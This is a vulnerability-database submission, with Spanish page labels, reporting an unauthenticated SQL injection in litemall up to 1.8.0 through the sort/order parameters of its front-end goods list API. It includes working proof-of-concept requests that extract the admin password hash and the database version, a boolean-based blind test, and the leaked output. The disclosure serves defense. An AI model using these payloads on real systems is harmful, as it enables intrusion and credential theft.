Enviar #811467: linlinjava litemall up to 1.8.0 SQL Injectioninformación

Títulolinlinjava litemall up to 1.8.0 SQL Injection
DescripciónA critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall)up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection. IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2). Vulnerable code in WxGoodsController.java: @GetMapping("list") public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...) LitemallGoodsService.java line 121-122: if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) { example.setOrderByClause(sort + " " + order); } MyBatis: order by ${orderByClause} No @Sort whitelist annotation is applied to WxGoodsController. PoC 1 - Extract admin password hash from FRONT-END (no admin auth required): GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10 Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' Admin bcrypt hash leaked from front-end API! PoC 2 - Extract MySQL version: GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc Response error: XPATH syntax error: '~8.0.45~' PoC 3 - Boolean-based blind: GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name Different order confirms injection. Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all. Reporter: berna ([email protected])
Fuente⚠️ https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
Usuario
 berna (UID 97558)
Sumisión2026-04-23 16:38 (hace 1 mes)
Moderación2026-05-17 11:36 (24 days later)
EstadoAceptado
Entrada de VulDB364396 [linlinjava litemall hasta 1.8.0 Front-end WeChat API WxGoodsController.java list inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Want to know what is going to be exploited?

We predict KEV entries!